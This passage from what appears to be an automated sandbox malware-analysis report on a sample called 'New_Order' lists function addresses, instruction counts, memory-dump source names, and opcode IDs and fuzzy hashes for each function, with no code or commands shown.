                                                                                                • Instruction Fuzzy Hash: 4A515C75A1021ACFCB15CF5CC580AADF7B2FF84710F2481A9DA19A7351D770AE41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01286154 Relevance: .1, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7850d1f32b8f1b3033d98c97dcd7f588b79d7f95c7493d1447dbb40d76d19289
                                                                                                • Instruction ID: b14871d6111a5c77a88e9302e51b299c090050114de616e801905f8766ad52ff
                                                                                                • Opcode Fuzzy Hash: 7850d1f32b8f1b3033d98c97dcd7f588b79d7f95c7493d1447dbb40d76d19289
                                                                                                • Instruction Fuzzy Hash: 585106B0A21617DBEB35DB28CC15BB8BBB1EF15314F0482E9E629A72C5D7749981CF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01280BCD Relevance: .1, Instructions: 130COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cf0c3e9cad6982fd8851d9adbd425c0cc6a675853e7e3ace211668803b486629
                                                                                                • Instruction ID: e53b283db770ee7f378a450a0c068d75dd8abbbc1df656013ace790982578b02
                                                                                                • Opcode Fuzzy Hash: cf0c3e9cad6982fd8851d9adbd425c0cc6a675853e7e3ace211668803b486629
                                                                                                • Instruction Fuzzy Hash: B1418531A216299FDF21EF6CC940BEE77B8EF55740F0100A5EA08AB281DB749E84CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0134866E Relevance: .1, Instructions: 129COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                • Instruction ID: 8e0d54d7a1a0b26f76add8b3cd9a6e3f81115991bfbffe8edf133d5378e64bb6
                                                                                                • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                • Instruction Fuzzy Hash: 4B41B575B00105ABEB15DFDDCC94AAFBFFAEF85258F1440A9EA00A7341D674ED0087A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01280887 Relevance: .1, Instructions: 128COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bc145cbc9510dc9328684fbfa07af17688d40a357af72478ba5a825c457e7518
                                                                                                • Instruction ID: 5eedd0f5b54d4d89d4b8223ce1bbeae02e61ba3bd9c12654ddb039aaa70c871e
                                                                                                • Opcode Fuzzy Hash: bc145cbc9510dc9328684fbfa07af17688d40a357af72478ba5a825c457e7518
                                                                                                • Instruction Fuzzy Hash: B841E5B0621702DFE725EF28C480A22B7F8FF44714B104A6DE65787691E730F849CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AA470 Relevance: .1, Instructions: 127COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: eca7c1ea0dd2bb75b85eb1cc072b7e5040bedf08f584c745239b7d359fb79a51
                                                                                                • Instruction ID: 4c73ba89b6964a5faa2933949c1d66049e2cd4530c919243f2242f01122e6739
                                                                                                • Opcode Fuzzy Hash: eca7c1ea0dd2bb75b85eb1cc072b7e5040bedf08f584c745239b7d359fb79a51
                                                                                                • Instruction Fuzzy Hash: EE41DA32964206CFDF25DF6CE8947ED7BB4FF18310F840169D611AB281DB74A944CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01288BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 039f1d8d4b7c90164a16a87c5f1fa7343a4f0152be229e0e796d6a6b33a15cb5
                                                                                                • Instruction ID: bb80e0c0a70b5ec7ba36a4a959d1c6002a614abe1ee2efdd46c4c2968aea7c62
                                                                                                • Opcode Fuzzy Hash: 039f1d8d4b7c90164a16a87c5f1fa7343a4f0152be229e0e796d6a6b33a15cb5
                                                                                                • Instruction Fuzzy Hash: 7B414A31922206CBD738EF58C840A6ABBF9FF98704F54812ED5019B799D775E841CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01278918 Relevance: .1, Instructions: 123COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f3a0e690444e9e21dcf8a67821a9a3f90bc9808bee459fece2eb7c352fad883e
                                                                                                • Instruction ID: 9da0452e7c8ab473bcc43f02153773968f9abade68e2c1a7bfa8de3055852a96
                                                                                                • Opcode Fuzzy Hash: f3a0e690444e9e21dcf8a67821a9a3f90bc9808bee459fece2eb7c352fad883e
                                                                                                • Instruction Fuzzy Hash: 35417C32528746DFE312DF69C841A6BB7E8AF84B54F41092AFA84D7250E770DE058B93
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0127A020 Relevance: .1, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction ID: 148190f5894bcc9a2847c3d8168401acdacaf48edad1d9470b985cae1b867c35
                                                                                                • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                • Instruction Fuzzy Hash: 2A413B31A20213DFDB22DE19C4517BFBB71EB51764F1A84AAFB459B240D6738D40CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012809AD Relevance: .1, Instructions: 122COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1f81d308bb2db0a7738e7ff43ccf0601acbf366fb6b86da74fb87bf318f1a246
                                                                                                • Instruction ID: e95e584458e9ffa1eca3604d0220aa888a3d5b7a899644ef392a4af0198836d8
                                                                                                • Opcode Fuzzy Hash: 1f81d308bb2db0a7738e7ff43ccf0601acbf366fb6b86da74fb87bf318f1a246
                                                                                                • Instruction Fuzzy Hash: FB418B71622702EFD721EF18C840B26BBF4FF54714F20862AE649CB291E771E946CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012B0710 Relevance: .1, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                • Instruction ID: 85a53deec5da996a4937048a797a596ca18312ac9d007906f789b09ee40d2dcf
                                                                                                • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                • Instruction Fuzzy Hash: B6414771A10605EFDB25CF98C9C0AAABBF9FF18740B10496DE256D7250D730EA44DF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0128262C Relevance: .1, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 68990c672073d5c8247d527218404855304219354fe73c79977e0790a087fd40
                                                                                                • Instruction ID: e71f1ebacbadb841b8700dd3d44139842c03a2a724b2172bf62ef951886f4dcb
                                                                                                • Opcode Fuzzy Hash: 68990c672073d5c8247d527218404855304219354fe73c79977e0790a087fd40
                                                                                                • Instruction Fuzzy Hash: EB41CFB0522702DFDB25FF29C941A69B7F5FF54318F1082AAC6169B2E1DB309941CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BC8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a076970d8d69420b87b3924c10d6a4861330c6c1dba1afb7bc783626fb127c37
                                                                                                • Instruction ID: 4797da93533a560d20878774d243a82efb323614cf84fe783d4d78b6070b3667
                                                                                                • Opcode Fuzzy Hash: a076970d8d69420b87b3924c10d6a4861330c6c1dba1afb7bc783626fb127c37
                                                                                                • Instruction Fuzzy Hash: 29318CB1A10746DFDB52CF58C440BA9BBF4FB09758F2081AED619EB251D3369902CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013007C3 Relevance: .1, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d9f7f4ea9d10acad0c0efa62e88dcf6d630178cad518004e0c103322f9fbc059
                                                                                                • Instruction ID: 3a134602f98e612df8499bcf6323c289266d5181aa30ef92e213abfc23d8523b
                                                                                                • Opcode Fuzzy Hash: d9f7f4ea9d10acad0c0efa62e88dcf6d630178cad518004e0c103322f9fbc059
                                                                                                • Instruction Fuzzy Hash: 72419E715183419FD361DF29C845BABBBE8FF88764F004A2EF598C7291D7709904CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013005A7 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e538ba2653f513edd3ee42574db6c5563f28be7b0f19feebfec667975d8b02f1
                                                                                                • Instruction ID: e892a9d71e31cb661b9143d3facfb4dc84757b3f794aa5651b0fb82fd2f08514
                                                                                                • Opcode Fuzzy Hash: e538ba2653f513edd3ee42574db6c5563f28be7b0f19feebfec667975d8b02f1
                                                                                                • Instruction Fuzzy Hash: 8741D1726046469BC325DF6CC890B7AB7E9FFC8744F14062DF99497680E730E904C7A6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01284859 Relevance: .1, Instructions: 111COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 639179ec081fc82af753b22fc7cba8a990755cbc567bc62c87739c1334d05eff
                                                                                                • Instruction ID: ecca1a5c60d5678c4aa685cc852d27872eef94a0f287d17f1766b51c9b861d76
                                                                                                • Opcode Fuzzy Hash: 639179ec081fc82af753b22fc7cba8a990755cbc567bc62c87739c1334d05eff
                                                                                                • Instruction Fuzzy Hash: 1741AE702223838BDB35FF2CD894B2ABBA9EF80364F15442DE6558B2D1DB74D911CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012902E1 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                • Instruction ID: 913e49e0c31717427a64c47a5fa2d2661a070976c679fb274bdf3324ffddc1e4
                                                                                                • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                • Instruction Fuzzy Hash: B431F531A25249ABDF129B6CCC44BAEBBE9AF14350F044165F855D7392C7B49884CBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 625c1722471ce7041d780633d9d071e6925d3e0ad8823633d375c22275b9e5ea
                                                                                                • Instruction ID: 20a3f994cf3b6ea14938031a3576a797272066870b87010b2fad0230e4dbb8c6
                                                                                                • Opcode Fuzzy Hash: 625c1722471ce7041d780633d9d071e6925d3e0ad8823633d375c22275b9e5ea
                                                                                                • Instruction Fuzzy Hash: 3531BC35750756ABDB22AF658C41FBB76B9AB59B54F000038F604BB291DA74DC00C7D0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01334B4B Relevance: .1, Instructions: 104COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0a35932560794f33bd20433afc748dfcc6806c019bd777ee9890a828d546e132
                                                                                                • Instruction ID: 7310136a36e6bcb5fd64c41fa5a088dafcc4cd647c960b404f698385bbe397f4
                                                                                                • Opcode Fuzzy Hash: 0a35932560794f33bd20433afc748dfcc6806c019bd777ee9890a828d546e132
                                                                                                • Instruction Fuzzy Hash: CA31F0722156119FCB35DF1DD890E26BBEAFBC1324F0A446EE9998B251D730E804CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01284260 Relevance: .1, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 76085fccdd94a5b5c1375ee50cfb76b093a3111e47ca051e2e51676437a58268
                                                                                                • Instruction ID: 00e76b59cef5e94b4c368f0e59e20df01f0b6bcfa96c33a2a9983ce6b0cf2737
                                                                                                • Opcode Fuzzy Hash: 76085fccdd94a5b5c1375ee50cfb76b093a3111e47ca051e2e51676437a58268
                                                                                                • Instruction Fuzzy Hash: 3841FF31221B42DFD722EF28C495FE67BE8BF44314F10842DEA998B290C7B0E804CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01334BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 766e36688a44f89e03660367b0394d331696ce648ad442fc83efbaa11c6226fa
                                                                                                • Instruction ID: 658d857d161a616632c421d57d926745ed7d7b1abffec9837751b38bbf21a1be
                                                                                                • Opcode Fuzzy Hash: 766e36688a44f89e03660367b0394d331696ce648ad442fc83efbaa11c6226fa
                                                                                                • Instruction Fuzzy Hash: D531CF71204302AFDB24DF28C891A2AB7E9FBC4714F05452DF9599B250E730EC04CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012FEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9bae36d523a87c64a1814e4c09a29df8194e816696782645b3b3f1830f72036e
                                                                                                • Instruction ID: 9f6906c68040115df5d8341d1979e17a28b84ceb67f128d2ecbe7a4869b51b81
                                                                                                • Opcode Fuzzy Hash: 9bae36d523a87c64a1814e4c09a29df8194e816696782645b3b3f1830f72036e
                                                                                                • Instruction Fuzzy Hash: F731C43122168B9BF727976CC958B25BBD8BB41744F1B00B8AB45976F1EB68D840C271
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013461C3 Relevance: .1, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5794510d76b2a82e6e58320536563326f003288b79fc8c040f127da625fa4022
                                                                                                • Instruction ID: a90e51c047927c3a769cb2c868983c2e5ea814e52a128f92a77830f6a8d41ab3
                                                                                                • Opcode Fuzzy Hash: 5794510d76b2a82e6e58320536563326f003288b79fc8c040f127da625fa4022
                                                                                                • Instruction Fuzzy Hash: 1031D0B5A0025ABBDB15DF98CC41BAEB7F9EB45B44F454168EA00AB244D770AD00CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132483A Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9e4ee266e1ff45bb60c33737977c44e6f1e42cbc7995f8d739064104a10b52f4
                                                                                                • Instruction ID: 2979a52711d6119e1eb6a52e73a77eac49005804dc0cc88281f38172ca61dda8
                                                                                                • Opcode Fuzzy Hash: 9e4ee266e1ff45bb60c33737977c44e6f1e42cbc7995f8d739064104a10b52f4
                                                                                                • Instruction Fuzzy Hash: 00317476A4112DABCF21EF58DD84BDEBBF9AB98714F1001A5E508A7250CA30DE91CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012AEB20 Relevance: .1, Instructions: 96COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: be4c6789ddc736b8b24199a6bd62431e6dbd83b294e4cf28415c763099263e4a
                                                                                                • Instruction ID: b6287fa0269c6e95091d6226ffc180720344444e2a348fe7576c18ba20e1e086
                                                                                                • Opcode Fuzzy Hash: be4c6789ddc736b8b24199a6bd62431e6dbd83b294e4cf28415c763099263e4a
                                                                                                • Instruction Fuzzy Hash: 6131E772E21215EFDB21DFA9CC44AAEBBF9FF04750F524465E616D7250E2709E018BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 013460B8 Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ad2b3b0d6716acda8da46d6cf185abce4d071102760d96d12b64e89363f0bdb
                                                                                                • Instruction ID: a69f1e81442caab4daac5a5de0afd2dc99ad94e20497eaf3f6eb3e883f159758
                                                                                                • Opcode Fuzzy Hash: 4ad2b3b0d6716acda8da46d6cf185abce4d071102760d96d12b64e89363f0bdb
                                                                                                • Instruction Fuzzy Hash: 2A31D1B1A00616EFDB269FADCC51B6ABBF9EF45758F00406DE505EB342DA30EC008B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012807AF Relevance: .1, Instructions: 95COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf7c6e33464523900b9959423c84615e0dbd58ededc98ea6b98cd113e98b06da
                                                                                                • Instruction ID: c65721031275955c87cfc7b9cc05e46e2ddf95a93b8c812ba6ce6b0330427ae1
                                                                                                • Opcode Fuzzy Hash: bf7c6e33464523900b9959423c84615e0dbd58ededc98ea6b98cd113e98b06da
                                                                                                • Instruction Fuzzy Hash: 75310832A36612DFC712FF28C88097FBBA5AF94250F014529FD5597390DA30DC5587E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01288550 Relevance: .1, Instructions: 94COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4535bbb2017037a69d0daa00d769ffb5c496b1fa1df7ae86d794e9d05269e873
                                                                                                • Instruction ID: 6c0f91a938ebd2bde82cb95e9ee2b96ead40e1d9a27dc3aba3238e0ef49e84ce
                                                                                                • Opcode Fuzzy Hash: 4535bbb2017037a69d0daa00d769ffb5c496b1fa1df7ae86d794e9d05269e873
                                                                                                • Instruction Fuzzy Hash: EC31C271625302CFE320DF19C844B26BBE9FF98700F85496DEA8597391D374E844CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 012BA6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                • Instruction ID: 2378b1c25077e1ac1c6b3f53261d12588e2c7037282d75bcd6a385bbd32ade26
                                                                                                • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                • Instruction Fuzzy Hash: 16312E72B14701AFD765CF6DCD81B9BBBF8AF08B90F04452DA69AC3651E630E900DB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0132EBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, Offset: 01250000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_1250000_New_Order.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8f5889b95d7779138f350af43dc7a3553f32afc584fe40cb82d9c07db0172537
